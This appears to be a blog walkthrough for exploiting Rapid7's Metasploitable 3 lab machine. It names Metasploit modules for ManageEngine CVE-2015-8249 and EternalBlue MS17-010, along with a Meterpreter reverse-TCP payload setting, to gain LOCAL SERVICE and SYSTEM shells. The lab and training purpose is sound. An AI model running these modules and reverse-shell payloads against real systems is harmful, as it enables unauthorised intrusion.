# Metasploitable 3 Exploitation Guide

## Introduction

Hello all, in this post I will be going over the ways to exploit code and gain a shell on Rapid7’s Metasploitable 3 machine. Each vulnerability will be split into it’s own section and explained with links for reference, I will also go over ways to escalate privileges from LOCAL SERVICE shells to SYSTEM, by combining multiple exploits. Each week I will add more, so consider it a rolling post where I will update it with each new vulnerability I find and then exploit. The link to each section will as usual, be in the table of contents at the side of the page. If you have any questions feel free to reach out to me on my Twitter, or my Discord, both linked at the side. Without further ado, let’s get started.

These are just some useful links and resources if you get stuck exploiting the machine.

## Metasploit Prerequisites

To make our lives easier I will launch metasploit with the msfdb run command to launch msf and start the database for credential storage, I will also use the setg command to globally set the RHOST and LHOST to the IP of Metasploitable3 and our local IP respectively.

## Exploiting Manage Engine - CVE-2015-8249

The first vulnerability we will be exploiting is to do with an outdated Manage Engine Desktop Central implementation, there is a CVE with a metasploit module and this allows for unauthenticated remote code execution as LOCAL SERVICE, the module we will be using is, exploit/windows/http/manageengine_connectionid_write, all we need to do is load up the module and run exploit as we have already set the RHOST and LHOST with setg. We also need to make sure that we are using a 64 bit payload as Metasploitable 3 is a 64 bit machine. We can set the correct payload with, set payload windows/x64/meterpreter/reverse_tcp.

Bingo, we got a shell as LOCAL SERVICE.

Here is a link to an in-depth article exploiting this vulnerability - Here

## Exploiting EternalBlue, MS17-010

The next vulnerability we will exploit is MS17-010, EternalBlue. To exploit this vulnerability, it is quite simple, all we need to do is load the module in metasploit and then run the exploit.

Bingo, we got a shell as system.

Categories:

Updated: